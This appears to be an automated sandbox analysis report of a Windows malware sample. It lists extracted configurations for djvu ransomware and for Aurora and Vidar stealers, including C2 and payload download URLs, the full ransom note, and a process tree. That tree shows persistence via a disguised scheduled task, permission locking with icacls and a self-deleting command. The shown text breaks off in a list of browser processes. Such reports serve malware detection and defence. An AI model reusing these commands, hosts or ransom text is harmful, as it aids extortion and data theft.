Resubmissions

09/01/2023, 12:46 UTC

230109-pzzzkaeb73 10

31/12/2022, 16:26 UTC

221231-txqekahh85 10

31/12/2022, 16:11 UTC

221231-tnc3wahh62 10

Analysis

  • max time kernel
    300s
  • max time network
    394s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09/01/2023, 12:46 UTC

General

  • Target

    2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe

  • Size

    262KB

  • MD5

    a58ba818715cbcd50fff388b246e04d1

  • SHA1

    52ebdb14a8e3d61ffc6b3df3d76c4434733ea7de

  • SHA256

    2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f

  • SHA512

    d6a98a816a0e5561128d674371f130cf43b68bc4c350866b20d1eac970e4c5aa4db53badec16dc27df3695e97d2bdb6e6fa8ae72981324671c060457c03339ee

  • SSDEEP

    3072:MlLntn1Y9zL3g7foklrmRQXN7SCzyLgCmN6kb5vfOxOvlmqrzn8f227hZY:sneL3qocb7SufCJ4SOYcn8rZY

Malware Config

Extracted

Family

djvu

C2

http://spaceris.com/lancer/get.php

Attributes
  • extension

    .zouu

  • offline_id

    7hl6KB3alcoZ6n4DhS2rApCezkIMzShntAiXWMt1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://spaceris.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-N3pXlaPXFm Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0631JOsie

rsa_pubkey.plain

Extracted

Family

aurora

C2

82.115.223.77:8081

Extracted

Family

vidar

Version

1.8

Botnet

19

C2

https://t.me/year2023start

https://steamcommunity.com/profiles/76561199467421923

Attributes
  • profile_id

    19

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • DcRat 5 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 10 IoCs
  • Detects Smokeloader packer 2 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 18 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 40 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe
    "C:\Users\Admin\AppData\Local\Temp\2f7a15691c51124019ccf5cbde2f399e52164f645b70bf4aaab596391146bb7f.exe"
    1⤵
    • DcRat
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4136
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1760
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 476 -p 4896 -ip 4896
    1⤵
      PID:4400
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4896 -s 2472
      1⤵
      • Program crash
      PID:3100
    • C:\Users\Admin\AppData\Local\Temp\E738.exe
      C:\Users\Admin\AppData\Local\Temp\E738.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:720
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 1252
        2⤵
        • Program crash
        PID:3920
    • C:\Users\Admin\AppData\Local\Temp\E95C.exe
      C:\Users\Admin\AppData\Local\Temp\E95C.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4780
    • C:\Users\Admin\AppData\Local\Temp\EE4F.exe
      C:\Users\Admin\AppData\Local\Temp\EE4F.exe
      1⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1572
    • C:\Users\Admin\AppData\Local\Temp\F17C.exe
      C:\Users\Admin\AppData\Local\Temp\F17C.exe
      1⤵
      • Executes dropped EXE
      PID:3856
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 340
        2⤵
        • Program crash
        PID:1184
    • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
      C:\Users\Admin\AppData\Local\Temp\F4F8.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
        C:\Users\Admin\AppData\Local\Temp\F4F8.exe
        2⤵
        • DcRat
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\icacls.exe
          icacls "C:\Users\Admin\AppData\Local\1843ef78-7b18-4241-a3da-b93e861de0c2" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          3⤵
          • Modifies file permissions
          PID:4728
        • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
          "C:\Users\Admin\AppData\Local\Temp\F4F8.exe" --Admin IsNotAutoStart IsNotTask
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1284
          • C:\Users\Admin\AppData\Local\Temp\F4F8.exe
            "C:\Users\Admin\AppData\Local\Temp\F4F8.exe" --Admin IsNotAutoStart IsNotTask
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4176
            • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe
              "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:3012
              • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe
                "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe"
                6⤵
                • Executes dropped EXE
                • Checks computer location settings
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2100
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build2.exe" & exit
                  7⤵
                    PID:2684
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      8⤵
                      • Delays execution with timeout.exe
                      PID:4548
              • C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build3.exe
                "C:\Users\Admin\AppData\Local\9d87f84d-b658-43a1-9daf-8de6b126c79b\build3.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3704
                • C:\Windows\SysWOW64\schtasks.exe
                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                  6⤵
                  • DcRat
                  • Creates scheduled task(s)
                  PID:3900
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3856 -ip 3856
        1⤵
          PID:3720
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 720 -ip 720
          1⤵
            PID:3904
          • C:\Users\Admin\AppData\Local\Temp\4F2E.exe
            C:\Users\Admin\AppData\Local\Temp\4F2E.exe
            1⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2768
            • C:\Users\Admin\AppData\Roaming\venuzye.exe
              "C:\Users\Admin\AppData\Roaming\venuzye.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:368
              • C:\Windows\System32\Wbem\wmic.exe
                wmic os get Caption
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4208
              • C:\Windows\system32\cmd.exe
                cmd /C "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:792
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                    PID:2188
                • C:\Windows\system32\cmd.exe
                  cmd /C "wmic cpu get name"
                  3⤵
                    PID:3252
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic cpu get name
                      4⤵
                        PID:3596
                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4604
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    2⤵
                    • DcRat
                    • Creates scheduled task(s)
                    PID:4984
                • C:\Users\Admin\AppData\Local\Temp\B4A0.exe
                  C:\Users\Admin\AppData\Local\Temp\B4A0.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4452
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\Wtfoiq.tmp",Iyidwoiowsw
                    2⤵
                    • Blocklisted process makes network request
                    • Sets DLL path for service in the registry
                    • Sets service image path in registry
                    • Loads dropped DLL
                    • Accesses Microsoft Outlook accounts
                    • Accesses Microsoft Outlook profiles
                    • Suspicious use of SetThreadContext
                    • Drops file in Program Files directory
                    • Checks processor information in registry
                    • Modifies system certificate store
                    • outlook_office_path
                    • outlook_win_path
                    PID:2532
                    • C:\Windows\system32\rundll32.exe
                      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 15570
                      3⤵
                        PID:3336
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                        3⤵
                          PID:3324
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                          3⤵
                            PID:1860
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 320
                          2⤵
                          • Program crash
                          PID:2680
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4452 -ip 4452
                        1⤵
                          PID:5064
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                          1⤵
                          • Enumerates system info in registry
                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                          PID:3848
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x120,0x124,0xd4,0x128,0x7ffa6e634f50,0x7ffa6e634f60,0x7ffa6e634f70
                            2⤵
                              PID:3948
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1704 /prefetch:2
                              2⤵
                                PID:4808
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2060 /prefetch:8
                                2⤵
                                  PID:5036
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
                                  2⤵
                                    PID:3820
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
                                    2⤵
                                      PID:4612
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
                                      2⤵
                                        PID:2256
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
                                        2⤵
                                          PID:976
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4500 /prefetch:8
                                          2⤵
                                            PID:1020
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:8
                                            2⤵
                                              PID:4204
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
                                              2⤵
                                                PID:528
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
                                                2⤵
                                                  PID:3200
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5024 /prefetch:8
                                                  2⤵
                                                    PID:3284
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
                                                    2⤵
                                                      PID:2096
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5212 /prefetch:8
                                                      2⤵
                                                        PID:2880
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5116 /prefetch:8
                                                        2⤵
                                                          PID:4536
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
                                                          2⤵
                                                            PID:5028
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
                                                            2⤵
                                                              PID:4136
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5020 /prefetch:8
                                                              2⤵
                                                                PID:224
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                                                                2⤵
                                                                  PID:2544
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6052 /prefetch:8
                                                                  2⤵
                                                                    PID:1088
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5556 /prefetch:8
                                                                    2⤵
                                                                      PID:1788
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:1
                                                                      2⤵
                                                                        PID:5096
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2840 /prefetch:8
                                                                        2⤵
                                                                          PID:2032
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:8
                                                                          2⤵
                                                                            PID:4028
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8
                                                                            2⤵
                                                                              PID:380
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2704 /prefetch:8
                                                                              2⤵
                                                                                PID:2088
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:1
                                                                                2⤵
                                                                                  PID:3928
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
                                                                                  2⤵
                                                                                    PID:2880
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5316 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2612
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:8
                                                                                      2⤵
                                                                                        PID:396
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
                                                                                        2⤵
                                                                                          PID:2680
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
                                                                                          2⤵
                                                                                            PID:992
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1044 /prefetch:8
                                                                                            2⤵
                                                                                              PID:1176
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1608 /prefetch:8
                                                                                              2⤵
                                                                                                PID:204
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3544 /prefetch:2
                                                                                                2⤵
                                                                                                  PID:1572
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1668,4827902206882255530,1713183846994685492,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1032 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:4404
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
